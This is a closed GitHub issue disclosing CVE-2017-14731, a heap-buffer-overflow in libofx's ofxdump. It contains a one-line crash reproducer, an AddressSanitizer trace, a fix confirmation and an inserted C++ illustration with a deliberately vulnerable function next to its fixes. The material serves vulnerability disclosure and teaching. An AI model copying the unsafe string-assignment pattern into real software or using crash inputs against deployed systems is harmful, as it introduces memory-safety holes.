CVE-2017-14731: ofxdump heap-buffer-overflow /usr/include/c++/4.9/bits/char_traits.h:263 std::char_traits<char>::length(char const*) #10

Closed
fgeek opened this Issue Sep 25, 2017 · 3 comments

fgeek commented Sep 25, 2017

Hello,

Fuzzed with: afl-2.49, afl-utils
Credit: Henri Salo from Nixu Corporation
Notes: Thanks to Kapsi internet-käyttäjät ry for providing fuzzing resources.

You can create the reproducer with:

python3 -c "import binascii;print(binascii.unhexlify('3c4f46583e').decode('ascii'))" > char_traits-heap-buffer-overflow.ofx

And run it with ofxdump:

./bin/ofxdump char_traits-heap-buffer-overflow.ofx

LibOFX INFO: libofx_proc_file(): File format not specified, autodetecting...
(Above message occurred on Line 18446744073709551615, Column 18446744073709551615)
LibOFX INFO: libofx_proc_file(): Detected file format: OFX (Open Financial eXchange (OFX or QFX))
(Above message occurred on Line 18446744073709551615, Column 18446744073709551615)
=================================================================
==14513==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000ef71 at pc 0x7fac88506b4e bp 0x7ffdbe1202e0 sp 0x7ffdbe1202d8
READ of size 1 at 0x60200000ef71 thread T0
    #0 0x7fac88506b4d in std::char_traits<char>::length(char const*) /usr/include/c++/4.9/bits/char_traits.h:263
    #1 0x7fac88506b4d in std::string::assign(char const*) /usr/include/c++/4.9/bits/basic_string.h:1149
    #2 0x7fac88506b4d in std::string::operator=(char const*) /usr/include/c++/4.9/bits/basic_string.h:563
    #3 0x7fac88506b4d in ofx_proc_file(void*, char const*) /home/afl/src/libofx/lib/ofx_preproc.cpp:326
    #4 0x7fac884f4a82 in libofx_proc_file /home/afl/src/libofx/lib/file_preproc.cpp:94
    #5 0x402923 in main /home/afl/src/libofx/ofxdump/ofxdump.cpp:491
    #6 0x7fac87929b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
    #7 0x402dac (/home/afl/builds/libofx/2017-09-20/bin/ofxdump+0x402dac)

0x60200000ef71 is located 0 bytes to the right of 1-byte region [0x60200000ef70,0x60200000ef71)
allocated by thread T0 here:
    #0 0x7fac8881173f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
    #1 0x7fac88500737 in ofx_proc_file(void*, char const*) /home/afl/src/libofx/lib/ofx_preproc.cpp:311
    #2 0x7ffdbe1215bf ([stack]+0x1f5bf)

SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/include/c++/4.9/bits/char_traits.h:263 std::char_traits<char>::length(char const*)
Shadow bytes around the buggy address:
==14513==ABORTING
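The trace above shows a 1-byte heap region being read past its end by std::char_traits<char>::length, i.e. strlen called from std::string::operator=(const char*) on a buffer that was never NUL-terminated. The following is an added illustration of that defect class and its two usual fixes; it is not libofx's code, and read_chunk, assign_unsafe, assign_bounded and read_chunk_terminated are hypothetical names:

```cpp
// Added illustration (not libofx code) of the defect class in the ASan
// report: a heap buffer sized exactly to its payload, with no NUL
// terminator, handed to std::string::operator=(const char*), which calls
// std::char_traits<char>::length (strlen) and reads past the allocation.
#include <cstdlib>
#include <cstring>
#include <string>

// Hypothetical stand-in for reading a header chunk: allocates exactly `len`
// bytes (like the 1-byte region in the report) and copies the payload
// without a terminating NUL.
char *read_chunk(const char *src, size_t len) {
    char *buf = static_cast<char *>(std::malloc(len));
    if (buf == nullptr) return nullptr;
    std::memcpy(buf, src, len);
    return buf;
}

// Defective pattern: the length is recovered by strlen on a buffer that has
// no NUL inside its allocation, so ASan reports a heap-buffer-overflow READ.
// Kept for comparison only; never called here.
std::string assign_unsafe(const char *buf) {
    std::string s;
    s = buf;  // -> std::char_traits<char>::length(buf) overreads
    return s;
}

// Fix 1: pass the known length, so no terminator is needed.
std::string assign_bounded(const char *buf, size_t len) {
    return std::string(buf, len);
}

// Fix 2: allocate len + 1 and terminate, if a C string is really required.
char *read_chunk_terminated(const char *src, size_t len) {
    char *buf = static_cast<char *>(std::malloc(len + 1));
    if (buf == nullptr) return nullptr;
    std::memcpy(buf, src, len);
    buf[len] = '\0';
    return buf;
}

// Worked case using the reproducer's bytes: 3c4f46583e is "<OFX>".
std::string tag_from_reproducer() {
    const char payload[] = {'<', 'O', 'F', 'X', '>'};  // constructed, no NUL
    char *chunk = read_chunk(payload, sizeof payload);
    std::string tag = assign_bounded(chunk, sizeof payload);
    std::free(chunk);
    return tag;
}
```

Under ASan, swapping assign_bounded for assign_unsafe in tag_from_reproducer reproduces the same READ-of-size-1 report shape shown above.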

@fgeek fgeek changed the title from ofxdump heap-buffer-overflow /usr/include/c++/4.9/bits/char_traits.h:263 std::char_traits<char>::length(char const*) to CVE-2017-14731: ofxdump heap-buffer-overflow /usr/include/c++/4.9/bits/char_traits.h:263 std::char_traits<char>::length(char const*) Sep 25, 2017

alteholz commented Oct 28, 2017

Are there any news available for this issue?

Collaborator

cstim commented Oct 28, 2017

On my system the input file doesn't run into problems, neither with plain starting nor with valgrind. This is from git, c426e22 (released as version 0.9.12). I've committed fad8418 which should avoid some of the problems, but since I can't reproduce originally, I also don't know whether this fixed anything.

fgeek commented Oct 31, 2017

@cstim fad8418 commit fixes this issue, thank you.

@fgeek fgeek closed this Oct 31, 2017
